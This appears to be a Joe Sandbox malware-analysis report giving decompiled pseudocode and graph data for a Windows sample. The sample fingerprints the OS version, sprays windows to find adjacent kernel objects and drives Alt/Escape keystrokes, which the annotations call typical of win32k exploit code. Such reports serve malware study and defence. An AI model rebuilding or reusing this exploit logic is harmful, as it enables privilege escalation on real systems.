93c9b9 7891->7893 7900 93d050 GetForegroundWindow 7893->7900 7896 93ca23 7897 93c9f0 7898 93ca00 TranslateMessage DispatchMessageW GetMessageW 7897->7898 7898->7898 7899 93ca1c 7898->7899 7901 93d068 SystemParametersInfoW 7900->7901 7906 93c9c5 Sleep GetMessageW 7900->7906 7902 93d08b 7901->7902 7903 93d0ae SendMessageW SendMessageW SetFocus SetForegroundWindow 7901->7903 7902->7903 7904 93d092 SystemParametersInfoW 7902->7904 7905 93d0e4 SystemParametersInfoW 7903->7905 7903->7906 7904->7903 7905->7906 7906->7896 7906->7897 7372 93d538 7384 93d540 7372->7384 7373 93d70e 7375 93161c __setmbcp_nolock 6 API calls 7373->7375 7374 93d57c CreateThread 7374->7384 7377 93d736 7375->7377 7376 93d59c Sleep 7376->7384 7378 93d5af CreateWindowExW 7380 93d5f6 GetWindowLongW SetWindowLongW 7378->7380 7381 93d688 DestroyWindow DestroyWindow TerminateThread WaitForSingleObject 7378->7381 7379 93d6dd DestroyWindow DestroyWindow TerminateThread 7379->7384 7382 9310c5 7380->7382 7381->7384 7383 93d650 keybd_event keybd_event keybd_event keybd_event Sleep 7382->7383 7383->7381 7384->7373 7384->7374 7384->7376 7384->7378 7384->7379 7385 93c820 15 API calls 7384->7385 7385->7384 7386 9378bf 7387 9378d5 7386->7387 7388 9378c9 7386->7388 7388->7387 7389 9378ce CloseHandle 7388->7389 7389->7387 7390 931a3d 7392 931a49 __initptd 7390->7392 7391 931a62 7395 93354d _free 58 API calls 7391->7395 7399 931a71 7391->7399 7392->7391 7393 931b51 __initptd 7392->7393 7394 93354d _free 58 API calls 7392->7394 7394->7391 7395->7399 7396 93354d _free 58 API calls 7398 931a80 7396->7398 7397 931a8f 7401 931a9e 7397->7401 7402 93354d _free 58 API calls 7397->7402 7398->7397 7400 93354d _free 58 API calls 7398->7400 7399->7396 7399->7398 7400->7397 7403 931aad 7401->7403 7405 93354d _free 58 API calls 7401->7405 7402->7401 7404 931abc 7403->7404 7406 93354d _free 58 API calls 7403->7406 7407 931ace 7404->7407 7408 93354d _free 58 API calls 7404->7408 7405->7403 7406->7404 7409 9333ce __lock 58 API calls 
7407->7409 7408->7407 7413 931ad6 7409->7413 7410 931af9 7422 931b5d 7410->7422 7413->7410 7415 93354d _free 58 API calls 7413->7415 7414 9333ce __lock 58 API calls 7420 931b0d ___removelocaleref 7414->7420 7415->7410 7416 931b3e 7425 931b69 7416->7425 7419 93354d _free 58 API calls 7419->7393 7420->7416 7421 9336f3 ___freetlocinfo 58 API calls 7420->7421 7421->7416 7428 933538 LeaveCriticalSection 7422->7428 7424 931b06 7424->7414 7429 933538 LeaveCriticalSection 7425->7429 7427 931b4b 7427->7419 7428->7424 7429->7427 7430 93d23c 7431 93d1c5 7430->7431 7432 93d271 DestroyWindow 7431->7432 7433 93d280 7432->7433 7443 93d70e 7432->7443 7434 93d29a RegisterClassExW 7433->7434 7433->7443 7438 93d321 _memset 7434->7438 7434->7443 7435 93161c __setmbcp_nolock 6 API calls 7436 93d736 7435->7436 7437 93d340 CreateWindowExW 7437->7438 7441 93d37e 7437->7441 7438->7437 7438->7441 7439 93d4d7 7442 93d4fd DestroyWindow 7439->7442 7451 93d509 7439->7451 7440 93c750 LoadLibraryA GetProcAddress 7440->7441 7441->7439 7441->7440 7442->7439 7443->7435 7444 93d57c CreateThread 7444->7451 7445 93d59c Sleep 7445->7451 7446 93d5af CreateWindowExW 7448 93d5f6 GetWindowLongW SetWindowLongW 7446->7448 7449 93d688 DestroyWindow DestroyWindow TerminateThread WaitForSingleObject 7446->7449 7447 93d6dd DestroyWindow DestroyWindow TerminateThread 7447->7451 7450 9310c5 7448->7450 7449->7451 7452 93d650 keybd_event keybd_event keybd_event keybd_event Sleep 7450->7452 7451->7443 7451->7444 7451->7445 7451->7446 7451->7447 7453 93c820 15 API calls 7451->7453 7452->7449 7453->7451 7907 93d960 DefWindowProcW 7454 934a25 7461 9363f6 7454->7461 7457 934a38 7459 93354d _free 58 API calls 7457->7459 7460 934a43 7459->7460 7474 9363ff 7461->7474 7463 934a2a 7463->7457 7464 936627 7463->7464 7465 936633 __initptd 7464->7465 7466 9333ce __lock 58 API calls 7465->7466 7467 93663f 7466->7467 7468 9366a4 7467->7468 7472 936678 DeleteCriticalSection 7467->7472 7502 9372bd 7467->7502 7515 9366bb 7468->7515 

                      Control-flow Graph

                      C-Code - Quality: 90%
                      			E00931497(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
                      				intOrPtr _t15;
                      				void* _t16;
                      				void* _t17;
                      				void* _t19;
                      				void* _t22;
                      				void* _t23;
                      				void* _t24;
                      				intOrPtr _t25;
                      				signed int _t36;
                      				void* _t46;
                      				void* _t50;
                      				void* _t54;
                      
                      				_t48 = __esi;
                      				_t47 = __edi;
                      				_t46 = __edx;
                      				_push(0x14);
                      				_push(0x941e70);
                      				E009329F0(__ebx, __edi, __esi);
                      				E00932834(1);
                      				_t54 =  *0x930000 - 0x5a4d; // 0x5a4d
                      				if(_t54 == 0) {
                      					_t15 =  *0x93003c; // 0xf8
                      					__eflags =  *((intOrPtr*)(_t15 + 0x930000)) - 0x4550;
                      					if( *((intOrPtr*)(_t15 + 0x930000)) != 0x4550) {
                      						goto L1;
                      					} else {
                      						__eflags =  *((intOrPtr*)(_t15 + 0x930018)) - 0x10b;
                      						if( *((intOrPtr*)(_t15 + 0x930018)) != 0x10b) {
                      							goto L1;
                      						} else {
                      							_t36 = 0;
                      							__eflags =  *((intOrPtr*)(_t15 + 0x930074)) - 0xe;
                      							if( *((intOrPtr*)(_t15 + 0x930074)) > 0xe) {
                      								__eflags =  *(_t15 + 0x9300e8);
                      								_t6 =  *(_t15 + 0x9300e8) != 0;
                      								__eflags = _t6;
                      								_t36 = 0 | _t6;
                      							}
                      						}
                      					}
                      				} else {
                      					L1:
                      					_t36 = 0;
                      				}
                      				 *(_t50 - 0x1c) = _t36;
                      				_t16 = E00932041();
                      				_t55 = _t16;
                      				if(_t16 == 0) {
                      					E009315EB(0x1c);
                      				}
                      				_t17 = E00931CAC(_t36, _t47, _t55);
                      				_t56 = _t17;
                      				if(_t17 == 0) {
                      					_t17 = E009315EB(0x10);
                      				}
                      				E0093291D(_t17);
                      				 *(_t50 - 4) =  *(_t50 - 4) & 0x00000000;
                      				_t19 = E00932056(_t36, _t47, _t48, _t56); // executed
                      				if(_t19 < 0) {
                      					E009315EB(0x1b);
                      				}
                      				 *0x9591c0 = GetCommandLineA();
                      				 *0x957260 = E0093295D(_t46);
                      				_t22 = E0093230A();
                      				_t58 = _t22;
                      				if(_t22 < 0) {
                      					E00931D89(_t36, _t46, _t47, _t48, _t58, 8);
                      				}
                      				_t23 = E00932539(_t36, _t46, _t47, _t48);
                      				_t59 = _t23;
                      				if(_t23 < 0) {
                      					E00931D89(_t36, _t46, _t47, _t48, _t59, 9);
                      				}
                      				_t24 = E00931DC3(1);
                      				_t60 = _t24;
                      				if(_t24 != 0) {
                      					E00931D89(_t36, _t46, _t47, _t48, _t60, _t24);
                      				}
                      				_t25 =  *0x957278; // 0x1462a8
                      				 *0x957298 = _t25;
                      				_push(_t25);
                      				_push( *0x957270);
                      				_push( *0x95726c);
                      				E009313F5();
                      				_t49 = _t25;
                      				 *((intOrPtr*)(_t50 - 0x24)) = _t25;
                      				if(_t36 == 0) {
                      					E0093202D(_t49);
                      				}
                      				E00931DB4();
                      				 *(_t50 - 4) = 0xfffffffe;
                      				return E00932A35(_t49);
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: _fast_error_exit$CommandEnvironmentInitializeLineStrings___crt__cinit__ioinit__setargv__setenvp
                      • String ID: .$
                      • API String ID: 3919536372-2223841709
                      • Opcode ID: 447e92271375a9df1e2013866e30e85f0f24eb8dff11c132a35ea82408139404
                      • Instruction ID: ecf23839919412c23104172202239e24774b77e216e11c91aa7e08427df8307b
                      • Opcode Fuzzy Hash: 447e92271375a9df1e2013866e30e85f0f24eb8dff11c132a35ea82408139404
                      • Instruction Fuzzy Hash: 9A21C470A043019AEB157BF1BD56B6D32A8AFD0715F10416AF5168A1F2EB748A80DF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      • Executed
                      • Not Executed
                      C-Code - Quality: 84%
                      			E0093C090(void* __ebx, void* __edx, void* __esi) {
                      				signed int _v8;
                      				short _v10;
                      				short _v2008;
                      				char _v3032;
                      				signed int _v3036;
                      				intOrPtr _v3040;
                      				intOrPtr _v3044;
                      				struct _WNDCLASSEXW _v3092;
                      				void* __edi;
                      				signed int _t49;
                      				struct HWND__* _t64;
                      				signed int _t65;
                      				intOrPtr _t69;
                      				struct HWND__* _t71;
                      				intOrPtr _t76;
                      				intOrPtr _t85;
                      				intOrPtr _t87;
                      				intOrPtr _t98;
                      				intOrPtr _t105;
                      				intOrPtr _t121;
                      				intOrPtr _t126;
                      				void* _t128;
                      				void* _t129;
                      				void* _t146;
                      				void* _t147;
                      				signed int _t150;
                      				void* _t151;
                      				void* _t152;
                      				void* _t154;
                      				signed int _t156;
                      				signed int _t157;
                      				void* _t158;
                      				void* _t159;
                      				struct _SECURITY_ATTRIBUTES* _t160;
                      				signed int _t164;
                      
                      				_t155 = __esi;
                      				_t146 = __edx;
                      				_t125 = __ebx;
                      				_t49 =  *0x943050; // 0xce43520a
                      				_v8 = _t49 ^ _t164;
                      				if( *0x957fe8 == 0 ||  *0x957fec == 0) {
                      					return E0093161C(_t125, _v8 ^ _t164, _t146, _t147, _t155);
                      				} else {
                      					_push(_t147);
                      					_v3092.cbSize = 0x30;
                      					_v3092.cbClsExtra = 0;
                      					_v3092.cbWndExtra = 0;
                      					memset( &_v2008, 0x610061, 0x64 << 2);
                      					asm("xorps xmm0, xmm0");
                      					_v10 = 0;
                      					_v3092.style = 0;
                      					_v3092.lpfnWndProc = DefWindowProcW;
                      					_v3092.hInstance =  *0x958030;
                      					asm("movdqu [ebp-0xbf8], xmm0");
                      					_v3092.lpszClassName = L"MyExtraWnd";
                      					_v3092.hIconSm = 0;
                      					if(RegisterClassExW( &_v3092) != 0) {
                      						E00935A90( &_v3032, 0, 0x400);
                      						_t150 = 0;
                      						while(1) {
                      							_t64 = CreateWindowExW(0, L"MyExtraWnd",  &_v2008, 0, 0, 0, 0, 0, 0, 0,  *0x958030, 0);
                      							 *(_t164 + _t150 * 4 - 0xbd4) = _t64;
                      							if(_t64 == 0) {
                      								break;
                      							}
                      							_t150 = _t150 + 1;
                      							if(_t150 < 0x100) {
                      								continue;
                      							}
                      							break;
                      						}
                      						_t65 = 0;
                      						_push(_t125);
                      						_v3036 = 0;
                      						_push(_t155);
                      						do {
                      							_t66 =  *((intOrPtr*)(_t164 + _t65 * 4 - 0xbd4));
                      							_t156 = 0;
                      							_v3040 =  *((intOrPtr*)(_t164 + _t65 * 4 - 0xbd4));
                      							while(1) {
                      								_t126 =  *((intOrPtr*)(E0093C750(_t66) + 0x10));
                      								_t69 =  *((intOrPtr*)(E0093C750( *((intOrPtr*)(_t164 + _t156 * 4 - 0xbd4))) + 0x10));
                      								_v3044 = _t69;
                      								if(_t126 < _t69 && _t126 + 0x40000 > _t69 + 0x300) {
                      									break;
                      								}
                      								_t156 = _t156 + 1;
                      								if(_t156 <= _t150) {
                      									_t66 = _v3040;
                      									continue;
                      								}
                      								L14:
                      								if( *0x958004 == 0 ||  *0x958010 == 0) {
                      									goto L16;
                      								}
                      								goto L17;
                      							}
                      							 *0x958004 = _v3040;
                      							 *0x958010 =  *((intOrPtr*)(_t164 + _t156 * 4 - 0xbd4));
                      							 *0x958008 = E0093C750(_v3040);
                      							 *0x958014 = E0093C750( *((intOrPtr*)(_t164 + _t156 * 4 - 0xbd4)));
                      							 *0x95800c = _t126;
                      							 *0x958018 = _v3044;
                      							 *0x958020 =  *((intOrPtr*)( *0x958008 + 8));
                      							_t121 =  *0x957fe8; // 0x0
                      							 *0x95801c =  *0x95800c + _t121 + 0xfffffffc;
                      							goto L14;
                      							L16:
                      							_t65 = _v3036 + 1;
                      							_v3036 = _t65;
                      						} while (_t65 <= _t150);
                      						L17:
                      						_t157 = 0;
                      						do {
                      							_t71 =  *(_t164 + _t157 * 4 - 0xbd4);
                      							if(_t71 !=  *0x958004 && _t71 !=  *0x958010) {
                      								DestroyWindow(_t71);
                      							}
                      							_t157 = _t157 + 1;
                      						} while (_t157 < 0x100);
                      						if( *0x958004 == 0 ||  *0x958010 == 0) {
                      							_pop(_t158);
                      							_pop(_t128);
                      							_pop(_t151);
                      							return E0093161C(_t128, _v8 ^ _t164, _t146, _t151, _t158);
                      						} else {
                      							if( *0x958024 == 0) {
                      								while(1) {
                      									_t76 =  *0x9441a0; // 0xa
                      									if( *0x958034 >= _t76) {
                      										goto L33;
                      									}
                      									 *0x958048 = 0;
                      									 *0x95804c = 0;
                      									 *0x958044 = 0;
                      									if( *0x958024 == 0) {
                      										_t160 = 0;
                      										 *0x958038 = CreateThread(0, 0, E0093B970, 0, 0, 0);
                      										while( *0x958044 == 0) {
                      											_t160 =  &(_t160->nLength);
                      											Sleep(0x32);
                      											if(_t160 < 0x14) {
                      												continue;
                      											} else {
                      												L31:
                      												DestroyWindow( *0x958048);
                      												DestroyWindow( *0x95804c);
                      												TerminateThread( *0x958038, 0xffffffff);
                      											}
                      											goto L32;
                      										}
                      										if(_t160 >= 0x14) {
                      											goto L31;
                      										} else {
                      											_t85 =  *0x9441a8; // 0x258
                      											_t87 =  *0x9441a4; // 0x320
                      											 *0x95804c = CreateWindowExW(0x80000, L"MyMainWnd", 0, 0x10000000, _t87 + 1, _t85 + 1, 1, 1, 0, 0,  *0x958030, 0);
                      											if( *0x95804c != 0) {
                      												SetWindowLongW( *0x95804c, 0xfffffff0, GetWindowLongW( *0x95804c, 0xfffffff0) | 0x40000000);
                      												_t105 =  *0x957fec; // 0x0
                      												SetWindowLongW( *0x95804c, 0xfffffff4,  *0x95800c + _t105 + 0xffffffef);
                      												keybd_event(0x12, 0, 0, 0);
                      												keybd_event(0x1b, 0, 0, 0);
                      												keybd_event(0x1b, 0, 2, 0);
                      												keybd_event(0x12, 0, 2, 0);
                      												Sleep(0x64);
                      											}
                      											DestroyWindow( *0x958048);
                      											DestroyWindow( *0x95804c);
                      											TerminateThread( *0x958038, 0xffffffff);
                      											WaitForSingleObject( *0x958038, 0xffffffff);
                      											if( *0x958024 == 0) {
                      												_t98 =  *0x957fec; // 0x0
                      												if( *((intOrPtr*)( *0x958008 + _t98)) >= 0x4000000) {
                      													 *0x958024 = E0093B6E0();
                      												}
                      											}
                      											goto L32;
                      										}
                      										goto L42;
                      									}
                      									L32:
                      									 *0x958034 =  *0x958034 + 1;
                      									if( *0x958024 == 0) {
                      										continue;
                      									}
                      									goto L33;
                      								}
                      							}
                      							L33:
                      							_pop(_t159);
                      							_pop(_t129);
                      							_pop(_t152);
                      							return E0093161C(_t129, _v8 ^ _t164, _t146, _t152, _t159);
                      						}
                      					} else {
                      						_pop(_t154);
                      						return E0093161C(__ebx, _v8 ^ _t164, _t146, _t154, __esi);
                      					}
                      				}
                      				L42:
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.270957240.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true
                      • Associated: 00000000.00000002.270954040.0000000000930000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.270971167.000000000093E000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271007675.0000000000943000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271011558.0000000000944000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271021541.0000000000957000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271024856.0000000000959000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.271028191.000000000095A000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_930000_vy3mvlAaCZ.jbxd
                      Yara matches
                      Similarity
                      • API ID: Window$ClassCreateDestroyRegister_memset
                      • String ID: 0$MyExtraWnd$MyMainWnd
                      • API String ID: 1202089904-3217463316
                      • Opcode ID: 271261a2dcca78167b595e7fe9ac8d408c28f692e9f97e4b3a934a4d69e6b9a4
                      • Instruction ID: 3202a7cc09f35e6bf18389ab78518a0d852e0df8a6e27500f7c2ac3180a31f74
                      • Opcode Fuzzy Hash: 271261a2dcca78167b595e7fe9ac8d408c28f692e9f97e4b3a934a4d69e6b9a4
                      • Instruction Fuzzy Hash: 6FB1B0B0A28714DFDB60DFB5EC45BAA77A8FB08315F100155E919B72E0DBB4A884EF50
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Control-flow Graph

                      Basic blocks of E0093BA30 from the graph export, sorted by address (block id, address range, calls, successors). The executed/not-executed colouring of the rendered graph is not carried in this text.

                      292  93ba30-93ba78  Sleep, GetModuleHandleA, LoadLibraryA       -> 293, 294
                      293  93ba7a-93ba8b  call 93161c (exit)
                      294  93ba8e-93baaf  GetVersionExW                                -> 296, 297
                      296  93bab5-93babc                                               -> 300, 301
                      301  93babe-93bac5                                               -> 300, 304
                      304  93bac7-93bad5                                               -> 305, 310
                      310  93badb-93bae2                                               -> 305
                      300  93bae4-93baed  GetModuleHandleA                             -> 305, 306
                      306  93baef-93baff                                               -> 311, 312
                      311  93bb01-93bb03                                               -> 318, 319
                      319  93bb05-93bb0f                                               -> 305
                      318  93bb11-93bb14                                               -> 320, 321
                      321  93bb16-93bb20                                               -> 305
                      320  93bb22-93bb25                                               -> 324, 325
                      325  93bb27-93bb31                                               -> 305
                      324  93bb33-93bb36                                               -> 293, 328
                      328  93bb3c-93bb46                                               -> 305
                      312  93bb48-93bb4b                                               -> 293, 315
                      315  93bb51                                                      -> 305
                      305  93bb5b-93bb6c  IsWow64Process                               -> 293, 307
                      307  93bb72-93bb79                                               -> 293, 316
                      316  93bb7f-93bbde  call 93bf60, call 93bd80                     -> 293, 331
                      331  93bbe4-93bbe6                                               -> 293, 332
                      332  93bbec-93bbf3                                               -> 333, 334
                      333  93bbf5-93bbfe  GetModuleHandleA                             -> 334, 335
                      335  93bc00-93bc07                                               -> 337
                      334  93bc09-93bc10                                               -> 336, 337
                      336  93bc12-93bc1b  GetModuleHandleA                             -> 337, 338
                      338  93bc1d                                                      -> 337
                      337  93bc24-93bc54                                               -> 297
                      297  93bc59-93bcc5  RegisterClassExW                             -> 293, 299
                      299  93bccb-93bcfd  GetSystemMetrics * 2, CreateThread           -> 302, 303
                      303  93bcff-93bd07                                               -> 308, 309
                      309  93bd09                                                      -> 317
                      317  93bd10-93bd1b                                               -> 308, 323
                      323  93bd1d-93bd29                                               -> 308, 327
                      327  93bd2b-93bd37  Sleep                                        -> 308, 317
                      308  93bd39-93bd5e  TerminateThread, Sleep, keybd_event * 2      -> 302
                      302  93bd60-93bd75  call 93161c (exit)
                      C-Code - Quality: 81%
			// Editor's reading of this routine: it fingerprints the real OS version, refuses to run
			// under WoW64, fills a set of version-dependent constants, resolves an unexported user32
			// routine (E0093C790, reached under E0093BF60 according to the return addresses in its API
			// list), registers the "MyMainWnd" window class and starts a worker thread. Per-version
			// constant tables plus that kind of gadget scan are typical of win32k exploit code, but the
			// report does not identify which vulnerability, if any, is targeted.
			E0093BA30(void* __ebx, signed int __edx, intOrPtr _a4) {
                      				signed int _v8;
                      				char _v10;
                      				struct _OSVERSIONINFOW _v292;
                      				int _v296;
                      				struct _WNDCLASSEXW _v344;
                      				void* __edi;
                      				void* __esi;
                      				signed int _t37;
                      				signed int _t57;
                      				signed int _t58;
                      				struct HINSTANCE__* _t61;
                      				int* _t62;
                      				signed int _t63;
                      				signed int _t65;
                      				signed int _t67;
                      				signed int _t69;
                      				intOrPtr _t72;
                      				intOrPtr _t73;
                      				signed int _t75;
                      				signed int _t79;
                      				signed int _t85;
                      				void* _t86;
                      				void* _t87;
                      				void* _t88;
                      				intOrPtr _t93;
                      				signed int _t94;
                      				void* _t95;
                      				void* _t96;
                      				void* _t98;
                      				signed int _t99;
                      
                      				_t94 = __edx;
                      				_t86 = __ebx;
				_t37 =  *0x943050; // 0xce43520a (MSVC /GS stack cookie; E0093161C verifies it on every return path)
				_v8 = _t37 ^ _t99;
                      				_t95 = Sleep;
                      				_v296 = 0;
				Sleep(0xc8); // 200 ms
                      				_t96 = GetModuleHandleA;
                      				 *0x958030 = GetModuleHandleA(0);
                      				if(LoadLibraryA("USER32.dll") != 0) {
                      					 *0x95802c = _a4;
					_v292.dwOSVersionInfoSize = 0x11c; // sizeof(OSVERSIONINFOEXW); _v10 below is its trailing wProductType field
					if(GetVersionExW( &_v292) == 0) {
						L30:
						// Also reached directly when GetVersionExW fails, in which case none of the
						// version-dependent values at 0x957fe4..0x958000 have been filled in.
						asm("xorps xmm0, xmm0");
						_v344.hInstance =  *0x958030;
                      						_v344.cbSize = 0x30;
                      						_v344.style = 0;
                      						_v344.lpfnWndProc = E0093D960;
                      						_v344.cbClsExtra = 0;
                      						_v344.cbWndExtra = 0;
						asm("movdqu [ebp-0x13c], xmm0"); // zeroes hCursor, hbrBackground, lpszMenuName (and lpszClassName, set just below)
                      						_v344.lpszClassName = L"MyMainWnd";
                      						_v344.hIconSm = 0;
                      						if(RegisterClassExW( &_v344) == 0) {
                      							goto L1;
                      						} else {
                      							_t97 = GetSystemMetrics;
                      							_push(_t86);
							 *0x9441a4 = GetSystemMetrics(0); // SM_CXSCREEN
							 *0x9441a8 = GetSystemMetrics(1); // SM_CYSCREEN
							_t87 = CreateThread(0, 0, E0093C090, 0, 0, 0); // worker thread; E0093C090 is not part of this excerpt
                      							if(_t87 != 0) {
                      								_t98 = 0;
								// Poll every 100 ms until the counter at 0x958034 reaches *0x9441a0 (10), the flag at
								// 0x958024 is set, or 10 * (*0x9441a0) iterations (10 s) have elapsed.
								if( *0x958024 == 0) {
									while(1) {
										_t57 =  *0x9441a0; // 0xa
										if( *0x958034 >= _t57) {
											goto L37;
										}
										_t58 =  *0x9441a0; // 0xa
										if(_t98 < _t58 + _t58 * 4 + _t58 + _t58 * 4) { // == 10 * _t58; the decompiler kept the lea/add strength reduction
                      											Sleep(0x64);
                      											_t98 = _t98 + 1;
                      											if( *0x958024 == 0) {
                      												continue;
                      											}
                      										}
                      										goto L37;
                      									}
                      								}
                      								L37:
								TerminateThread(_t87, 0);
								Sleep(0x64);
								_t97 = keybd_event;
								keybd_event(0x1b, 0, 2, 0); // VK_ESCAPE, KEYEVENTF_KEYUP
								keybd_event(0x12, 0, 2, 0); // VK_MENU (Alt), KEYEVENTF_KEYUP: releases any menu/Alt state the worker left behind
                      							}
                      							_pop(_t88);
                      							return E0093161C(_t88, _v8 ^ _t99, _t94, _t95, _t97);
                      						}
                      					} else {
						// Anything other than XP/2003 as reported by GetVersionExW: take the version that ntdll.dll
						// was built for straight from its PE header (IMAGE_OPTIONAL_HEADER.MajorOperatingSystemVersion
						// at e_lfanew+0x40, MinorOperatingSystemVersion at +0x42). Compatibility shims can lie to
						// GetVersionEx, but not to this read.
						if(_v292.dwMajorVersion != 5 || _v292.dwMinorVersion < 1) {
							_t61 = GetModuleHandleA("ntdll.dll");
							if(_t61 == 0) {
								goto L19;
							} else {
								_t93 =  *((intOrPtr*)(_t61 + 0x3c)); // e_lfanew
								_t94 =  *(_t93 + _t61 + 0x40) & 0x0000ffff; // MajorOperatingSystemVersion
								_t85 =  *(_t93 + _t61 + 0x42) & 0x0000ffff; // MinorOperatingSystemVersion
								// Version -> table index at 0x9440bc: 6.0 -> 4, 6.1 -> 6, 6.2 -> 8, 6.3 -> 0xa, 10.x -> 0xc;
								// any other version aborts via L1.
                      								if(_t94 != 6) {
                      									if(_t94 != 0xa) {
                      										goto L1;
                      									} else {
                      										 *0x9440bc = 0xc;
                      										goto L19;
                      									}
                      								} else {
                      									if(_t85 != 0) {
                      										if(_t85 != 1) {
                      											if(_t85 != 2) {
                      												if(_t85 != 3) {
                      													goto L1;
                      												} else {
                      													 *0x9440bc = 0xa;
                      													goto L19;
                      												}
                      											} else {
                      												 *0x9440bc = 8;
                      												goto L19;
                      											}
                      										} else {
                      											 *0x9440bc = 6;
                      											goto L19;
                      										}
                      									} else {
                      										 *0x9440bc = 4;
                      										goto L19;
                      									}
                      								}
                      							}
                      						} else {
							 *0x9440bc = 0; // XP / Server 2003 reported: GetVersionExW is trusted
							if(_v10 != 1) { // wProductType != VER_NT_WORKSTATION, i.e. a server SKU
								 *0x9440bc =  *0x9440bc + 2;
                      							}
							L19:
							// IsWow64Process(GetCurrentProcess(), &wow64): abort if the call fails or if this 32-bit
							// process runs under WoW64, i.e. on 64-bit Windows. On the w10x64 machine used for this
							// report that is the case, so if execution reaches this check it exits here.
							_t62 =  &_v296;
							__imp__IsWow64Process(0xffffffff, _t62); // -1 is the GetCurrentProcess() pseudo-handle
							if(_t62 == 0 || _v296 != 0) {
                      								goto L1;
                      							} else {
								// Four version-specific constants from the tables at 0x9440c0, 0x9440f8, 0x944130 and
								// 0x944168 (4-byte entries indexed by the version index); the first is overwritten right
								// away with the result of E0093BF60, under which E0093C790's IsMenu scan runs.
								_t63 =  *0x9440bc; // 0x0
								 *0x957fe8 =  *((intOrPtr*)(0x9440c0 + _t63 * 4));
                      								_t65 =  *0x9440bc; // 0x0
                      								 *0x957ff8 =  *((intOrPtr*)(0x9440f8 + _t65 * 4));
                      								_t67 =  *0x9440bc; // 0x0
                      								 *0x957ffc =  *((intOrPtr*)(0x944130 + _t67 * 4));
                      								_t69 =  *0x9440bc; // 0x0
                      								 *0x958000 =  *((intOrPtr*)(0x944168 + _t69 * 4));
                      								 *0x957fe8 = E0093BF60();
                      								_t72 = E0093BD80();
                      								 *0x957fec = _t72;
                      								if( *0x957fe8 == 0 || _t72 == 0) {
                      									goto L1;
                      								} else {
									// Adjust one constant on Windows 10 builds that ship win32u.dll (index 0xc: +8).
									// Index 0xd is never assigned in this routine, so the -4 branch is either set
									// elsewhere or dead.
									if( *0x9440bc != 0xc || GetModuleHandleA("win32u.dll") == 0) {
										if( *0x9440bc == 0xd && GetModuleHandleA("win32u.dll") != 0) {
                      											 *0x957ff8 =  *0x957ff8 - 4;
                      										}
                      									} else {
                      										 *0x957ff8 =  *0x957ff8 + 8;
                      									}
									_t73 =  *0x957fec; // 0x0
									 *0x957ff0 = _t73 + 0xfffffffc; // i.e. E0093BD80() - 4
									_t75 =  *0x957fe0; // 0x0
									asm("sbb eax, eax"); // sbb idiom: eax becomes 0 or -1 depending on whether *0x957fe0 is zero
									 *0x957fe4 = ( ~_t75 & 0x00000018) + 0x2a; // selects 0x2a or 0x42 (the ~ is the decompiler's rendering of that mask)
									_t79 =  *0x957fe0; // 0x0
									asm("sbb eax, eax");
									 *0x957ff4 = ( ~_t79 & 0x00000024) + 0x34; // selects 0x34 or 0x58 with the same flag
                      									goto L30;
                      								}
                      							}
                      						}
                      					}
                      				} else {
					L1: // common failure/exit path
					return E0093161C(_t86, _v8 ^ _t99, _t94, _t95, _t96); // /GS cookie check, then return
                      				}
			}

                      APIs
                      • Sleep.KERNEL32(000000C8,?,00000000), ref: 0093BA5A
                      • GetModuleHandleA.KERNEL32(00000000,?,00000000), ref: 0093BA64
                      • LoadLibraryA.KERNEL32(USER32.dll,?,00000000), ref: 0093BA70
                      • GetVersionExW.KERNEL32(?,?,00000000), ref: 0093BAA7
                      • IsWow64Process.KERNEL32(000000FF,00000000,?,00000000), ref: 0093BB64
                      • GetModuleHandleA.KERNEL32(win32u.dll,?,00000000), ref: 0093BBFA
                      • RegisterClassExW.USER32 ref: 0093BCBC
                      • GetSystemMetrics.USER32 ref: 0093BCD4
                      • GetSystemMetrics.USER32 ref: 0093BCDD
                      • CreateThread.KERNEL32 ref: 0093BCF3
                      Strings
                      Yara matches
                      Similarity
                      • API ID: HandleMetricsModuleSystem$ClassCreateLibraryLoadProcessRegisterSleepThreadVersionWow64
                      • String ID: 0$MyMainWnd$USER32.dll$ntdll.dll$win32u.dll
                      • API String ID: 1875908182-450879528
                      • Opcode ID: 9d20ce9f99cd7b50ae21414c2aa293be8aabcaa3cd9cb569bd017e7cf346c700
                      • Instruction ID: f1693c77f0634008dee14a09a905064371cfd11060b10d25613196471560b8d9
                      • Opcode Fuzzy Hash: 9d20ce9f99cd7b50ae21414c2aa293be8aabcaa3cd9cb569bd017e7cf346c700
                      • Instruction Fuzzy Hash: E8818D75A2C314DBDB20CFA5EC45BA9B7F4EB09305F10015AEA04E72E0DBB49994EF51
                      Uniqueness

                      Uniqueness Score: -1.00%
